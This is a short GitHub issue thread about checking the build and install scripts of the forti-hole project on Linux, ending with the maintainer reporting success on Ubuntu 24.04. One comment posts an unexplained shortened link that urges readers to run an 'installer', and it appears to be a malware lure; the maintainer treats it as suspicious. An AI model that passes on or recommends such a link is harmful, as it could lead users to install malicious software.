### ISSUE TITLE
Verify the build and install scripts for linux

### ISSUE THREAD

**Issue by cooperlarson** [coopsdev/forti-hole#1]
* The build script was written with knowledge of the build process on mac os and linux
* I don't encourage anyone to use windows as an os, nevertheless, I am doing my best to keep windows server users in mind and will do everything I can to ensure the build script functions there and elsewhere.
  * If Windows Server functionality is essential to your use-case, i'd be happy to help implement it with your testing environment if you'd like to contribute.

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by cooperlarson** [comment]
I appreciate the interest, but am not fond of risky clicks. Please assure me you are human and have interest in this project, or I will remove the link.

**Comment by cooperlarson** [comment]
Scripts are verified to work on Ubuntu 24.04 LTS x86_64 and arm64 architecture
